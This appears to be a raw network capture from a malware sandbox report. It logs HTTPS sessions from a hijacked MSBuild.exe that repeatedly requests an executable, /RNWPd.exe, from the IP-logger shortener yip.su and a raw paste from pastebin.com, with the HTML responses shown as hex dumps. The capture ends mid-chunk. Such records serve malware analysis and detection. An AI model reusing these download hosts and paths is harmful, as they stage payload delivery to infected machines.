6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:21:49 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:21:49 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:21:49 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:21:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49752	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:51 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:21:51 UTC	900	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:21:51 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:21:51 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ca43NPgQQIGgVYHT5H6gHpOfeQtkVdCX1c%2FGvINqyI1qOQmdcSlepImvMlXOJ26VSkRWRal1FbD6tiLN%2BPcVEIidw6DJY1gnfdmKC00fF%2B7iL2Iok6fJT28%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c4338d1ab284241-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:21:51 UTC	469	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:21:51 UTC	1369	IN	Data Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
2024-09-16 19:21:51 UTC	1369	IN	Data Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
2024-09-16 19:21:51 UTC	1369	IN	Data Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
2024-09-16 19:21:51 UTC	1369	IN	Data Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
2024-09-16 19:21:51 UTC	1369	IN	Data Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
2024-09-16 19:21:51 UTC	156	IN	Data Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:21:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	49754	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:55 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:21:56 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c4338eccc5e43ca-EWR
2024-09-16 19:21:56 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:21:56 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:21:56 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:21:56 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:21:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	49755	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:21:57 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:21:57 UTC	898	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:21:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:21:57 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:21:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kQvOAACLHYquX1qGGld17OeC4Z4Y6cCzAdGEvAY9difRVcTHoynHDOM%2F72nanHJtJQ9RvTIqoj1gk6kwy%2FH3ht6he3wTf1Vm3zbLotnqaFQNWLD6B9UJt1g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c4338f45c7d0f4a-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:21:57 UTC	471	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:21:57 UTC	1369	IN	Data Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
2024-09-16 19:21:57 UTC	1369	IN	Data Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
2024-09-16 19:21:57 UTC	1369	IN	Data Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 